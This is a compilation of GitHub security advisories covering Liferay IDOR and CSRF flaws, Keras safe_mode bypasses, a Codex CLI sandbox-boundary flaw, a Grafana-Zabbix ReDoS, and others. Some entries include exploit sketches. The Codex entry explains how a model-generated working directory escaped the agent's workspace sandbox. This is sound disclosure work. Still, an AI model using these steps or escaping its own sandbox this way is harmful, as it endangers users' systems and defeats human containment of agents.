Source
ghsa
Insecure direct object reference (IDOR) vulnerability in the Contacts Center widget in Liferay Portal 7.4.0 through 7.4.3.119, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.6, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions allows remote attackers to view contact information, including the contact’s name and email address, via the _com_liferay_contacts_web_portlet_ContactsCenterPortlet_entryId parameter.
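For illustration, an IDOR of this shape is typically confirmed by walking sequential IDs. A minimal Python sketch; only the parameter name below comes from the advisory, and the target URL and response check are hypothetical:

```python
# Hypothetical probe for the IDOR described above. Only the parameter name
# is taken from the advisory; the base URL and leak check are made up.
import requests

BASE = "https://portal.example.com/web/guest/home"  # hypothetical target page
PARAM = "_com_liferay_contacts_web_portlet_ContactsCenterPortlet_entryId"

for entry_id in range(1000, 1010):  # sequential IDs: the hallmark of IDOR
    resp = requests.get(BASE, params={PARAM: entry_id}, timeout=10)
    if resp.ok and "@" in resp.text:  # crude check for a leaked email address
        print(entry_id, "may expose contact data")
```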
Cross-Site Request Forgery (CSRF) vulnerability in the server (license) registration page in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.7, 2023.Q3.1 through 2023.Q3.9, 7.4 GA through update 92, and older unsupported versions allows remote attackers to register a server license via the 'orderUuid' parameter.
**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.

---

## Summary

When a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application.

This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique: `.h5` and `.hdf5` files are simply not checked for unsafe code execution. From this point on, I will refer only to the `.h5` file format, thoug...
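A minimal sketch of the reported bypass, assuming an unpatched Keras 3 installation affected by this report (the `demo` filenames are hypothetical). The same Lambda-bearing model is rejected when loaded from `.keras` under `safe_mode=True`, but loads silently from `.h5`:

```python
# Sketch of the safe_mode bypass for .h5 files (assumes a vulnerable Keras 3).
import keras

model = keras.Sequential([
    keras.Input(shape=(1,)),
    # Stand-in for attacker-controlled code: the lambda's bytecode is
    # serialized into the archive and revived on load.
    keras.layers.Lambda(lambda x: x),
])
model.save("demo.keras")
model.save("demo.h5")  # legacy HDF5 format

try:
    keras.models.load_model("demo.keras", safe_mode=True)
except ValueError:
    print(".keras load blocked, as documented")

# No error, no warning: safe_mode=True is silently ignored for .h5/.hdf5.
keras.models.load_model("demo.h5", safe_mode=True)
```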
Due to a bug in the sandbox configuration logic, Codex CLI could treat a model-generated `cwd` as the sandbox’s writable root, including paths outside of the folder where the user started their session. This logic bypassed the intended workspace boundary and enabled arbitrary file writes and command execution wherever the Codex process has permissions; it did not impact the network-disabled sandbox restriction.

**Remediation**

We released a patch in Codex CLI **0.39.0** that canonicalizes and validates that the boundary used for the sandbox policy is based on where the user started the session, not the one generated by the model. Users running 0.38.0 or earlier should update immediately via their package manager or by reinstalling the latest Codex CLI to ensure sandbox boundaries are enforced. If using the Codex IDE extension, users should update immediately to **0.4.12** for a fix of the sandbox issue.
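For illustration, a minimal sketch of this class of boundary check, written in Python rather than Codex CLI's own Rust; every name below is hypothetical:

```python
# Illustrative only (not Codex CLI source): canonicalize a model-supplied
# cwd and validate it against the boundary pinned at session start.
from pathlib import Path

def resolve_sandbox_cwd(session_root: str, model_cwd: str) -> Path:
    root = Path(session_root).resolve()       # canonical session boundary
    # Joining with an absolute model_cwd replaces root entirely, which is
    # exactly the escape the validation below has to catch.
    candidate = (root / model_cwd).resolve()  # collapses "..", symlink hops
    if not candidate.is_relative_to(root):    # must stay inside the boundary
        raise PermissionError(f"{candidate} escapes sandbox root {root}")
    return candidate
```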
Grafana is an open-source platform for monitoring and observability. Grafana-Zabbix is a plugin for Grafana that allows visualizing monitoring data from Zabbix and creating dashboards for analyzing metrics and real-time monitoring. Versions 5.2.1 and below contain a ReDoS vulnerability via a user-supplied regex query, which could cause CPU usage to max out. This vulnerability is fixed in version 6.0.0.
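For illustration, the failure mode is the classic catastrophic-backtracking pattern; a minimal Python sketch of the ReDoS class (not Grafana-Zabbix code), assuming nothing beyond the standard library:

```python
# A user-supplied pattern with nested quantifiers triggers catastrophic
# backtracking on a short non-matching input, pinning a CPU core.
import re

user_pattern = r"^(a+)+$"        # attacker-controlled "query regex"
hostile_input = "a" * 30 + "!"   # almost matches, but never does

re.match(user_pattern, hostile_input)  # exponential time in the input length
```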
### Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.

### Original Description

The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of Keras, which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives. Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. One can create a specially crafted .keras model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special config.json (a file within the .keras archive) that will invoke keras.config.enable_unsafe_deserialization() to disable safe mode. Once safe mode is disabled, one can use the Lambda layer feature of Keras, which allows arbitrary Python code in the form of pickled code. Both can appear in the same archive: the keras.config.enable_unsafe_deserialization() call simply needs to appear first in the archive, and the Lambda with the arbitrary code needs to come second.
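A minimal sketch of the two primitives being chained, assuming a Keras 3 installation affected by this report (the `demo.keras` filename is hypothetical; the crafted archive itself is not reproduced here):

```python
# Sketch of the guard safe mode provides and the switch that turns it off.
import keras

model = keras.Sequential([
    keras.Input(shape=(1,)),
    keras.layers.Lambda(lambda x: x),  # stand-in for attacker bytecode
])
model.save("demo.keras")

try:
    # Bytecode-serialized Lambda layers are rejected while safe mode is on.
    keras.models.load_model("demo.keras", safe_mode=True)
except ValueError:
    print("blocked by safe mode")

# This is the call the crafted config.json tricks the deserializer into
# making. It flips a process-wide flag, so once it runs (first entry in
# the archive), the Lambda later in the same archive loads freely.
keras.config.enable_unsafe_deserialization()
keras.models.load_model("demo.keras")  # now succeeds; lambda code is revived
```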
In the @digitalocean/do-markdownit package through 1.16.1 (in npm), the callout and fence_environment plugins perform .includes substring matching when allowedClasses or allowedEnvironments is a string (instead of an array), so any class or environment name that is merely a substring of the configured string is accepted as allowed.
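A minimal Python illustration of the pitfall (do-markdownit itself is JavaScript, where `String.prototype.includes` behaves like Python's `in` on strings):

```python
# Membership tested against a string is substring matching; membership
# tested against a list is exact matching.
allowed = "warning"               # misconfigured as a string, not ["warning"]
requested = "nin"                 # attacker-chosen class/environment name

print(requested in allowed)       # True  -- "nin" is a substring of "warning"
print(requested in ["warning"])   # False -- exact match required
```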
Snipe-IT before 8.1.18 allows unsafe deserialization.
Snipe-IT before 8.1.18 allows XSS.